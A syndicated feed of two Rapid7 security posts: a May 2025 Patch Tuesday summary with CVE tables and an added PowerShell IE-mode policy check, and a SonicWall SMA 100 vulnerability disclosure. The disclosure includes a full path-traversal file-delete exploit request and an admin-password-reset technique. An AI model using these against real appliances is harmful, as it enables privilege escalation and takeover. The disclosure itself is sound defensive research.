CVE-2025-32720 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-33060 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-47160 Windows Shortcut Files Security Feature Bypass Vulnerability No No 5.4

Patch Tuesday – May 2025

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/05/13/patch-tuesday-may-2025/


Microsoft is addressing 77 vulnerabilities this May 2025 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation for five of the vulnerabilities published today, and these are already reflected in CISA KEV. Separately, Microsoft is aware of existing public disclosure for two vulnerabilities published today. This is now the eighth consecutive Patch Tuesday on which Microsoft has published zero-day vulnerabilities without evaluating any of them as critical severity at time of publication. Today also sees the publication of six critical remote code execution (RCE) vulnerabilities. Six browser vulnerabilities have already been published separately this month, and are not included in the total.

Windows Scripting Engine: zero-day RCE

In the majority of cases, the CVSSv3 base score provides a solid sense of the severity of a vulnerability. Sometimes, however, even a correct CVSS assessment can disguise the potential impact of a specific vulnerability. This is arguably the case with CVE-2025-30397, a zero-day RCE vulnerability in the Windows Scripting Engine with a healthy but unremarkable CVSSv3 base score of 7.5. Microsoft is aware of exploitation in the wild. It’s certainly not the worst of the worst — we save that level of alarm for pre-authentication RCE with no requirement for user interaction — and Microsoft assesses attack complexity as high, which is arguably correct. And yet…

The advisory FAQ for CVE-2025-30397 explains that successful exploitation requires an attacker to first prepare the target so that it uses Edge in Internet Explorer Mode, and then cause the user to click a malicious link; there is no mention of a requirement for the user to actively reload the page in Internet Explorer Mode, so we must assume that exploitation requires only that the “Allow sites to be reloaded in Internet Explorer” option is enabled. Users who are most likely to require Internet Explorer compatibility mode in 2025 are surely users at enterprise organizations, where critical business workflows still depend on applications from the dinosaur days when Internet Explorer ruled the roost. No doubt the concept of a plan for migration of all of these applications exists, buried several layers deep in a dusty backlog, but Microsoft would hardly be offering IE compatibility mode until at least 2029 if it didn’t know that a huge swathe of its customer base demands it.

If the pre-requisite conditions are already conveniently in place on the target asset thanks to a well-meaning corporate IT policy, attack complexity is suddenly nice and low. If this vulnerability didn’t have that requirement for environment preparation, the CVSS base score would then be 8.8, which is as close to critical as you can get without actually stepping over the line. As Rapid7 has previously noted on a number of occasions, the MSHTML/Trident scripting engine is still present in Windows; this is true even for assets which have only ever run versions of Windows released well after the end of support for Internet Explorer 11 back in June 2022.
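Since the whole argument turns on whether the "environment preparation" has already been done by policy, a defender wants a way to find the hosts where it has. The script below is an added example, not Rapid7's, and rests on an assumption: that Edge's IE mode is governed by the policy values InternetExplorerIntegrationLevel, InternetExplorerIntegrationReloadInIEModeAllowed and InternetExplorerIntegrationSiteList under the Policies\Microsoft\Edge registry keys, with 1 meaning "on". Those names are not on this page; confirm them against Microsoft's Edge policy reference before relying on them. Only policy-managed settings are inspected; a user toggling the option in Edge's own settings UI is stored elsewhere and is not seen here.

```powershell
# Added example (not Rapid7 code). ASSUMPTION: the three policy value names below
# are the Edge IE-mode policies and 1 means enabled; verify against the Edge
# policy reference. Checks machine and user policy hives.
function Get-IeModePolicyState {
    $paths = 'HKLM:\SOFTWARE\Policies\Microsoft\Edge', 'HKCU:\SOFTWARE\Policies\Microsoft\Edge'
    $names = 'InternetExplorerIntegrationLevel',
             'InternetExplorerIntegrationReloadInIEModeAllowed',
             'InternetExplorerIntegrationSiteList'

    foreach ($p in $paths) {
        # Null when the policy key does not exist at all (no Edge policy applied).
        $props = Get-ItemProperty -Path $p -ErrorAction SilentlyContinue
        $state = [ordered]@{
            Hive             = $p.Split(':')[0]
            PolicyKeyPresent = [bool]$props
        }
        foreach ($n in $names) { $state[$n] = $props.$n }   # $null when unset

        # IntegrationLevel 1 = IE mode enabled for the configured site list;
        # ReloadInIEModeAllowed 1 = the "Allow sites to be reloaded in Internet
        # Explorer" option the advisory's attack path depends on.
        $state.IeModeEnabled     = ($state.InternetExplorerIntegrationLevel -eq 1)
        $state.ReloadInIeAllowed = ($state.InternetExplorerIntegrationReloadInIEModeAllowed -eq 1)
        [pscustomobject]$state
    }
}

function Test-IeModePrerequisiteMet {
    # True when either hive turns on IE mode or user-driven reload into IE mode:
    # on such a host the "high" attack complexity is already paid for by policy,
    # and CVE-2025-30397 should be treated as the 8.8 the text describes.
    $hit = Get-IeModePolicyState | Where-Object { $_.IeModeEnabled -or $_.ReloadInIeAllowed }
    [bool]$hit
}

Get-IeModePolicyState | Format-Table -AutoSize
"IE mode prerequisite for CVE-2025-30397 already in place: $(Test-IeModePrerequisiteMet)"
```

A non-empty InternetExplorerIntegrationSiteList alongside IeModeEnabled is the signature of exactly the enterprise scenario described above: a deliberate compatibility policy that, as a side effect, removes the attacker's hardest precondition.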

Common Log File System: zero-day EoPs

Neither CVE-2025-32701 nor CVE-2025-32706 is the first zero-day vulnerability in the Windows Common Log File System Driver; indeed, they are the latest members of an ongoing dynasty where exploitation typically leads to elevation of privilege to SYSTEM. Credit where credit is due: recent disclosures by Microsoft’s own Threat Intelligence Center (MSTIC), including this month’s CVE-2025-32701, demonstrate that Microsoft is putting serious effort into detecting and rooting out CLFS exploitation. Of course, since Microsoft is aware of exploitation in the wild, we know that someone else got there first, and there’s no reason to suspect that threat actors will stop looking for ways to abuse CLFS any time soon.

Windows Desktop Window Manager: zero-day EoP

If proof were needed that elevation of privilege to SYSTEM will never go out of style, today sees the publication of CVE-2025-30400, which is a zero-day vulnerability in the Windows Desktop Window Manager (DWM). As it happens, tomorrow marks the one-year anniversary of CVE-2024-30051, a previous zero-day EoP vulnerability in DWM.

Visual Studio: zero-day RCE

Today, all current versions of Visual Studio 2022 and 2019 receive patches for CVE-2025-32702, a zero-day RCE where exploitation requires the user to download and open a malicious file. There is nothing obviously remarkable about this, although Microsoft is aware of public disclosure. As usual for a malicious file/link vuln, the word Remote here refers to the location of the attacker, even though exploitation is set in motion by local user action.

Ancillary Function Driver for Winsock: zero-day EoP

Regular Patch Tuesday watchers will recognize the Ancillary Function Driver for Winsock, which is the site of CVE-2025-32709, an elevation of privilege vulnerability for which Microsoft is aware of exploitation. In something of a break with tradition for Patch Tuesday zero-day EoP vulnerabilities, exploitation only leads to administrator privileges rather than all the way to SYSTEM, but no attacker is going to waste too many cycles feeling sad about that.

Defender for Identity: situationally-ironic zero-day spoofing

Today sees the publication of CVE-2025-26685, a zero-day spoofing vulnerability in Microsoft Defender for Identity. The advisory provides puzzle pieces which don’t by themselves add up to anything like a full explanation of the vulnerability; no action is required for remediation, but you can render yourself vulnerable if you insist by opening a case with Microsoft Support to re-enable the legacy NTLM authentication method.

However, the FAQ does offer a link to an article published yesterday: Configure SAM-R to enable lateral movement path detection in Microsoft Defender for Identity. This solid piece of documentation is part of the overall Defender for Identity administration guide, and explains that the lateral movement path detection feature can itself potentially be exploited by an adversary to obtain an NTLM hash.

Exploitation relies on achieving fallback from Kerberos to NTLM; the compromised credentials in this case would be those of the Directory Service Account for Defender for Identity. The new Defender for Identity sensor (version 3.x) is not affected by this issue as it uses different detection methods; at time of writing, the Defender for Identity What’s new? page doesn’t yet describe the 3.x release, but this will presumably receive an update soon.

Microsoft lifecycle update

The next batch of significant Microsoft product lifecycle status changes is due in July 2025, when the SQL Server 2012 ESU program draws to a close, along with support for Visual Studio 2022 17.8 LTSC.

Summary charts

(Chart images: Patch Tuesday - May 2025)

Summary tables

Apps vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-29975 | Microsoft PC Manager Elevation of Privilege Vulnerability | No | No | 7.8 |

Azure vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-29972 | Azure Storage Resource Provider Spoofing Vulnerability | No | No | 9.9 |
| CVE-2025-29827 | Azure Automation Elevation of Privilege Vulnerability | No | No | 9.9 |
| CVE-2025-30387 | Document Intelligence Studio On-Prem Elevation of Privilege Vulnerability | No | No | 9.8 |
| CVE-2025-47733 | Microsoft Power Apps Information Disclosure Vulnerability | No | No | 9.1 |
| CVE-2025-33072 | Microsoft msagsfeedback.azurewebsites.net Information Disclosure Vulnerability | No | No | 8.1 |
| CVE-2025-29973 | Microsoft Azure File Sync Elevation of Privilege Vulnerability | No | No | 7 |

Azure Windows vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-27488 | Microsoft Windows Hardware Lab Kit (HLK) Elevation of Privilege Vulnerability | No | No | 6.7 |

Browser vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-29825 | Microsoft Edge (Chromium-based) Spoofing Vulnerability | No | No | 6.5 |
| CVE-2025-4372 | Chromium: CVE-2025-4372 Use after free in WebAudio | No | No | N/A |
| CVE-2025-4096 | Chromium: CVE-2025-4096 Heap buffer overflow in HTML | No | No | N/A |
| CVE-2025-4052 | Chromium: CVE-2025-4052 Inappropriate implementation in DevTools | No | No | N/A |
| CVE-2025-4051 | Chromium: CVE-2025-4051 Insufficient data validation in DevTools | No | No | N/A |
| CVE-2025-4050 | Chromium: CVE-2025-4050 Out of bounds memory access in DevTools | No | No | N/A |

Developer Tools vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-29813 | Azure DevOps Server Elevation of Privilege Vulnerability | No | No | 10 |
| CVE-2025-26646 | .NET, Visual Studio, and Build Tools for Visual Studio Spoofing Vulnerability | No | No | 8 |
| CVE-2025-32702 | Visual Studio Remote Code Execution Vulnerability | No | Yes | 7.8 |
| CVE-2025-21264 | Visual Studio Code Security Feature Bypass Vulnerability | No | No | 7.1 |
| CVE-2025-32703 | Visual Studio Information Disclosure Vulnerability | No | No | 5.5 |

ESU Windows vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-29962 | Windows Media Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-29966 | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-29967 | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-32701 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Yes | No | 7.8 |
| CVE-2025-32706 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Yes | No | 7.8 |
| CVE-2025-30385 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-32709 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Yes | No | 7.8 |
| CVE-2025-32707 | NTFS Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-24063 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-29831 | Windows Remote Desktop Services Remote Code Execution Vulnerability | No | No | 7.5 |
| CVE-2025-30397 | Scripting Engine Memory Corruption Vulnerability | Yes | No | 7.5 |
| CVE-2025-29969 | MS-EVEN RPC Remote Code Execution Vulnerability | No | No | 7.5 |
| CVE-2025-29833 | Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability | No | No | 7.1 |
| CVE-2025-27468 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | No | No | 7 |
| CVE-2025-29959 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability | No | No | 6.5 |
| CVE-2025-29960 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability | No | No | 6.5 |
| CVE-2025-29830 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability | No | No | 6.5 |
| CVE-2025-29832 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability | No | No | 6.5 |
| CVE-2025-29836 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability | No | No | 6.5 |
| CVE-2025-29958 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability | No | No | 6.5 |
| CVE-2025-29961 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability | No | No | 6.5 |
| CVE-2025-29835 | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 6.5 |
| CVE-2025-29968 | Active Directory Certificate Services (AD CS) Denial of Service Vulnerability | No | No | 6.5 |
| CVE-2025-29957 | Windows Deployment Services Denial of Service Vulnerability | No | No | 6.2 |
| CVE-2025-30394 | Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability | No | No | 5.9 |
| CVE-2025-29954 | Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability | No | No | 5.9 |
| CVE-2025-29974 | Windows Kernel Information Disclosure Vulnerability | No | No | 5.7 |
| CVE-2025-29837 | Windows Installer Information Disclosure Vulnerability | No | No | 5.5 |
| CVE-2025-29956 | Windows SMB Information Disclosure Vulnerability | No | No | 5.4 |
| CVE-2025-29839 | Windows Multiple UNC Provider Driver Information Disclosure Vulnerability | No | No | 4 |

Microsoft Dynamics vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-47732 | Microsoft Dataverse Remote Code Execution Vulnerability | No | No | 8.7 |
| CVE-2025-29826 | Microsoft Dataverse Elevation of Privilege Vulnerability | No | No | 7.3 |

Microsoft Office vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-30377 | Microsoft Office Remote Code Execution Vulnerability | No | No | 8.4 |
| CVE-2025-30386 | Microsoft Office Remote Code Execution Vulnerability | No | No | 8.4 |
| CVE-2025-32704 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 8.4 |
| CVE-2025-30382 | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-29976 | Microsoft SharePoint Server Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-29978 | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-32705 | Microsoft Outlook Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-29977 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-29979 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-30375 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-30376 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-30379 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-30381 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-30383 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-30393 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-30384 | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.4 |
| CVE-2025-30378 | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7 |

Microsoft Office ESU Windows vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-30388 | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 |

System Center vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-26684 | Microsoft Defender Elevation of Privilege Vulnerability | No | No | 6.7 |
| CVE-2025-26685 | Microsoft Defender for Identity Spoofing Vulnerability | No | Yes | 6.5 |

Windows vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
| --- | --- | --- | --- | --- |
| CVE-2025-29964 | Windows Media Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-29840 | Windows Media Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-29963 | Windows Media Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-30400 | Microsoft DWM Core Library Elevation of Privilege Vulnerability | Yes | No | 7.8 |
| CVE-2025-29970 | Microsoft Brokering File System Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-26677 | Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability | No | No | 7.5 |
| CVE-2025-29971 | Web Threat Defense (WTD.sys) Denial of Service Vulnerability | No | No | 7.5 |
| CVE-2025-29842 | UrlMon Security Feature Bypass Vulnerability | No | No | 7.5 |
| CVE-2025-29838 | Windows ExecutionContext Driver Elevation of Privilege Vulnerability | No | No | 7.4 |
| CVE-2025-29841 | Universal Print Management Service Elevation of Privilege Vulnerability | No | No | 7 |
| CVE-2025-29955 | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.2 |
| CVE-2025-29829 | Windows Trusted Runtime Interface Driver Information Disclosure Vulnerability | No | No | 5.5 |

Multiple vulnerabilities in SonicWall SMA 100 series (FIXED)

Post Syndicated from Ryan Emmons original https://blog.rapid7.com/2025/05/07/multiple-vulnerabilities-in-sonicwall-sma-100-series-2025/

Overview


In April of 2025, Rapid7 discovered and disclosed three new vulnerabilities affecting SonicWall Secure Mobile Access (“SMA”) 100 series appliances (SMA 200, 210, 400, 410, 500v). These vulnerabilities are tracked as CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821. An attacker with access to an SMA SSLVPN user account can chain these vulnerabilities to make a sensitive system directory writable, elevate their privileges to SMA administrator, and write an executable file to a system directory. This chain results in root-level remote code execution. These vulnerabilities have been fixed in version 10.2.1.15-81sv.

Rapid7 would like to thank the SonicWall security team for quickly responding to our disclosure and going above and beyond over a holiday weekend to get a patch out.

Vulnerability table

| CVE | Description | Affected Service | CVSS |
| --- | --- | --- | --- |
| CVE-2025-32819 | An authenticated attacker with user privileges can delete any file on the SMA appliance as root to perform privilege escalation to the administrator account. Based on known (private) IOCs and Rapid7 incident response investigations, we believe this vulnerability may have been used in the wild. | HTTP (Port 80), HTTPS (Port 443) | 8.8 (High) |
| CVE-2025-32820 | An authenticated attacker with user privileges can inject a path traversal sequence to make any directory on the SMA appliance writable by all users, including the nobody user. Any existing file on the system can also be overwritten with junk contents as root. | HTTP (Port 80), HTTPS (Port 443) | 8.3 (High) |
| CVE-2025-32821 | An authenticated attacker with administrator privileges can inject shell command arguments to upload a fully controlled file anywhere that the nobody user can write to. | HTTP (Port 80), HTTPS (Port 443) | 6.7 (Medium) |

Credit

These vulnerabilities were discovered by Ryan Emmons, Staff Security Researcher at Rapid7, and are being disclosed in accordance with Rapid7’s coordinated vulnerability disclosure policy.

Remediation

To remediate CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821, SonicWall SMA administrators should update to the latest version, 10.2.1.15-81sv. For additional information, please see SonicWall’s advisory.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821 with an unauthenticated vulnerability check expected to be available in today’s (May 7) content release.

Analysis

The appliance tested was “SMA 500v for ESXi” running version 10.2.1.14-75sv, the latest available at the time of research.


CVE-2025-32819

An attacker with access to a low-privilege SMA user account can delete any file as root. This vulnerability appears to be a patch bypass for a previously reported arbitrary file delete vulnerability. That original vulnerability was disclosed by NCC Group in 2021, and a patch was previously released in the 10.2.0.9-41sv and 10.2.1.3-27sv patch cycle. Rapid7 is not aware of any specific CVE assigned to this original vulnerability; the NCC Group blog post states that a CVE was not shared with them, and we didn’t see a clear 1:1 match on the SonicWall PSIRT page.

Based on our testing, the unauthenticated arbitrary file delete vulnerability disclosed by NCC Group was patched by adding an authentication check. However, that authentication check is satisfied with a valid low-privilege session cookie, so exploitation is still viable. An attacker can exploit this vulnerability with low privileges to elevate to SMA administrator. This can be chained with CVE-2025-32820 and CVE-2025-32821 to establish root-level remote code execution on the SMA research target running 10.2.1.14-75sv. Note: Based on known (private) IOCs and Rapid7 incident response investigations, we believe this vulnerability may have been used in the wild.

In /usr/src/EasyAccess/www/conf/httpd.conf, we observe that the /fileshare/sonicfiles web path is mapped to the sonicfiles.py Flask application.

WSGIScriptAliasMatch ^/fileshare/sonicfiles /usr/src/EasyAccess/www/python/sonicfiles/sonicfiles.py
WSGIScriptAliasMatch ^/report    /usr/src/EasyAccess/www/python/sonicfiles/report.py
WSGIScriptAliasMatch ^/threat/__api__/v1 /usr/src/EasyAccess/www/python/authentication_api/threat_api.py

Within sonicfiles.py, we find the function main_handler, the entry point that enforces authentication checks and dispatches the various “RacNumber” SMB operations. At [A], we see an authorization check being performed before the primary API functionality is reachable.

@application.route('/sonicfiles', methods=['GET', 'POST']) 
@application.route('/', methods=['GET', 'POST'])
def main_handler():

    #Get the required config if its not set
    #application.get_config()
    prog = 'fileexplorer'

    '''Alternate method for CSRF

    referrer = request.referrer
    parsed_referrer = urlparse(request.referrer)
    if((referrer is None) or (parsed_referrer.hostname != request.host)):
        print("Referrer something is wrong")
        return HttpErrorCode["NOT_PERMITTED_AUTH"]
    '''

    #set the log level to Debug when don't get the setting from SMA settings.
    application.set_log_level(logging.DEBUG)

    authResult = application.authorizationCheck() # [A]
    if authResult:
        response = make_response(str(HttpErrorCode["NOT_PERMITTED_AUTH"][0])) 
        response.headers['content-type'] = 'text/plain'
        response.headers['Cache-Control'] = 'no-cache'
        logger.info("::SONICFILES:: Authorization check failed {}".format(authResult))
        return response, HttpErrorCode["NOT_PERMITTED_AUTH"][1]

    racNum = request.args.get('RacNumber', RacNumber.RAC_INVALID, int)
    if racNum is RacNumber.RAC_INVALID:
        return 'Invalid invocation', 500 

    smbshare = FileShare(application)
[..SNIP..]

Let’s investigate what application.authorizationCheck is. It’s defined in pythonApi.py:

    def authorizationCheck(self):
        return self.api.authorizationCheck(self.get_connection_id(), request.method, request.args.get('swcctn'))

The self.get_connection_id function is depicted below. It fetches the swap cookie ([B]), which is the primary session cookie, then decodes it as base64 ([C]) and returns it.

    @staticmethod
    def get_connection_id():
        if (SONICFILES_UNIT_TEST_MODE):
            #connection = request.args.get('sessionid', "", string)
            sessionid = request.args.get('sessionid')
            connection = base64.b64decode(sessionid).decode('utf-8')
            print(connection)
            return connection

        swap = request.cookies.get("swap") # [B]
        if swap == None:
            return ""

        connection = base64.b64decode(swap).decode('utf-8') # [C]
        mask_connection = connection.replace(connection[4:-4], (len(connection)-8) * '*') # abcd***...***ABCD
        logger.debug("::SONICFILES:: session {}".format(mask_connection))
        return connection

Since the primary authorizationCheck function is a SWIG wrapper around native code, the cleaned-up decompiled C is depicted below. It calls sessionGetAndRefresh ([D]), which queries the web application’s primary SQLite database on disk, to determine whether the provided session is an authenticated one. If the session is valid (and, when the method is ‘POST’, if the CSRF token matches), it returns a success code ([E]).

0001b2e0    int32_t authorizationCheck(int32_t sessionId, char* method, int32_t swcctn)

0001b2e0    {
0001b2e0        int32_t currentSessionId = sessionId;
0001b315        int32_t sessionHandle = sessionGetAndRefresh(dbhGet(0), currentSessionId); // [D]
0001b31a        bool match = !sessionHandle;
0001b31a        
0001b31e        if (!sessionHandle)
0001b37b            return -1;
0001b37b        
0001b320        char* methodPointer = method;
0001b324        int32_t compareChars = 5;
0001b329        char const* const compareStr = "POST";
0001b329        
0001b32f        while (compareChars)
0001b32f        {
0001b32f            char mChar = *(uint8_t*)methodPointer;
0001b32f            char const compareChar = *(uint8_t*)compareStr;
0001b32f            match = mChar == compareChar;
0001b32f            methodPointer = &methodPointer[1];
0001b32f            compareStr = &compareStr[1];
0001b32f            compareChars -= 1;
0001b32f            
0001b32f            if (mChar != compareChar)
0001b32f                break;
0001b32f        }
0001b32f        
0001b331        if (match)
0001b331        {
0001b35f            currentSessionId = swcctn;
0001b35f            
0001b36a            if (doCSRFCheckForCgi(sessionHandle, currentSessionId))
0001b36a            {
0001b36f                sessionFree(sessionHandle);
0001b374                return -2;
0001b36a            }
0001b331        }
0001b331        
0001b336        sessionFree(sessionHandle, currentSessionId);
0001b33b        return 0; // [E]
0001b2e0    }

That establishes that any low-privileged user can call RacNumber functions via the sonicfiles API. In 2021, NCC Group outlined how the RAC_DOWNLOAD_TAR function (RacNumber=44) could be exploited with a path traversal for privileged arbitrary file deletion. That download_tar code does not appear to have been modified from what the NCC Group blog post shows, since the “/tmp” directory string is still unsafely concatenated with tainted web parameters ([F]); only the authentication check outlined above in main_handler appears to have been implemented as a fix.

    def download_tar(self, partialCmd):
        arg1 = self.get_decoded_url('Arg1')
        foldername = request.args.get('Arg2')
        timestamp = request.args.get('timestamp')
        list_file_path = None

        cmd_list = partialCmd.split()
        cmd_list.append(arg1)
        cmd_list.append(foldername)
        cmd_list.append("stdout")
        #appending verbose

        logger.debug("{} download_tar:: cmd_list: {}, timestamp {}".format(SONICFILES, cmd_list, timestamp))

        if timestamp is not None:
            swcctn = request.args.get('swcctn')
            list_file_path = '/tmp/' + swcctn + '_' + timestamp # [F]
            cmd_list.append(list_file_path)

        self.get_cred(cmd_list,arg1)#Appends cred to the list
        current_time = datetime.datetime.now().time()
        logger.debug("{} Download Start time : {}".format(SONICFILES, current_time.isoformat()))

        cmd_bytes_list = str_list_to_uft8_bytes_list(cmd_list)
        downloadsubprocess = subprocess.Popen(cmd_bytes_list,stdout=subprocess.PIPE,shell=False)
[..SNIP..]

Exploitation

We’ll start by creating a user named lowpriv with low user-level SMA privileges. This user account should not have access to any administrative functionality, and it will act as our victim account for exploitation. We’ll log in to the SMA web service listening on port 443 and establish that we have access to this standard user account.


We’ll create two attacker-owned files as root to demonstrate the privileged arbitrary file delete.


Next, we’ll grab our lowpriv user’s session cookies and use them to perform the malicious file delete web request. The server will return a generic 500 code error response.

GET /fileshare/sonicfiles/?User=admin&Pass=null&Domn=&RacNumber=44&Arg1=smb://192.168.200.1/test/&Arg2=null&swcctn=../usr/src/EasyAccess/www/python/authentication&timestamp=api/../../../../../../tmp/rootfile HTTP/1.1
Host: 192.168.181.150
Cookie: swap="MHo5dTZvQkNRcXhVWDVpMFo1MktCRGZmYkZjSE9CZm1FUU9QOWdUek5BZz0="; swcctn=JKUKl0KiKYX5Kf4nY7700B4lb5N7M1PD
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

With our console root shell, we can see that the root-owned /tmp/rootfile file has been deleted.


This can be leveraged to delete the /etc/EasyAccess/var/conf/persist.db file, which is the primary web server SQLite database. When that happens, the system will reboot and reset the SMA administrator password to “password”. Based on known (private) IOCs and Rapid7 incident response investigations, we believe that this specific technique may have been used in the wild.

CVE-2025-32820

An authenticated attacker with low user-level privileges can inject a path traversal sequence that makes an arbitrary directory on the SMA appliance world-writable. This can be chained with CVE-2025-32819 and CVE-2025-32821 to establish root-level remote code execution on the SMA research target running 10.2.1.14-75sv. Additionally, if a file path is provided instead of a directory, any existing file on the system can be overwritten with junk contents as root, creating a persistent denial of service condition.

Let’s investigate this now. In authentication_api/client/__init__.py, we observe authentication checks implemented in before_request ([G]).

@application.before_request
def before_request():
    logLevl = Logger.getLogLevel()
    application.logger.setLevel(logLevl)
    current_app.logger.info("{} {}".format(request.method, request.script_root + request.path))
    Authorize.authorization_check(request, current_app.logger, False) # [G]

This authorization_check function is similar to the one we previously looked at. However, this function is implemented in Python, within smaauthorize.py, instead of in a C shared library. Below, we can see this logic. The third parameter is called requireAdmin, and it defaults to True ([H]). In this case, though, the call within before_request explicitly states that low-privilege users should be allowed via the False parameter input. The authorization code queries the primary web SQLite database to determine whether the user’s swap session cookie exists in the database ([I]). If so, the request will succeed.

    @staticmethod
    def authorization_check(request, logger, requireAdmin = True): # [H]
        if (API_UNIT_TEST_MODE):
            return

        sessionId = request.cookies.get(AP_COOKIE_NAME)

        if (sessionId == None):
            logger.info("Login failed. No valid sessionId from cookie.")
            raise Unauthorized(AUTHORIZE_FAIL)

        temp_db_session = Session()
        sessionId_decoded = base64.b64decode(sessionId).decode()
        sslvpn_session = temp_db_session.query(SmaSession).filter(SmaSession.sessionId == sessionId_decoded).first() # [I]
        if (sslvpn_session == None):
            temp_db_session.close()
            logger.info("Login failed. No valid session. sessionId = {}, sessionId_decoded = {}".format(sessionId, sessionId_decoded))
            raise Unauthorized(AUTHORIZE_FAIL)

        # touch session
        sslvpn_session.activityTimestamp = int(time.time())
        temp_db_session.commit()
        temp_db_session.refresh(sslvpn_session)
        temp_db_session.close()

        # authorization check
        Authorize.sessionStatusCheck(logger, sslvpn_session)
        Authorize.userTypeCheck(logger, requireAdmin, sslvpn_session)
        Authorize.CSRFTokenCheck(logger, requireAdmin, sslvpn_session)

There are a few different API endpoints that can be reached as our low-privilege user. That list is depicted below:

clientApi.add_resource(NxDisconnectInfoResource, '/nxdisconnectinformation')
clientApi.add_resource(NxPostConnectionScriptResource, '/nxpostconnectionscript')
clientApi.add_resource(NxPostConnectionScriptFileResource, '/nxpostconnectionscript/file')
clientApi.add_resource(NxVersionResource, '/nxversion')
clientApi.add_resource(VpnParametersResource, '/vpnparameters')
clientApi.add_resource(SessionStatusResource, '/sessionstatus')
clientApi.add_resource(AlwaysOnResource, '/alwayson')
clientApi.add_resource(RecurringEpcProfileResource, '/recurringepcprofile')
clientApi.add_resource(BookmarkDetailListResource, '/bookmarkdetails')
clientApi.add_resource(ConnectionProxyResource, '/connectionproxy')
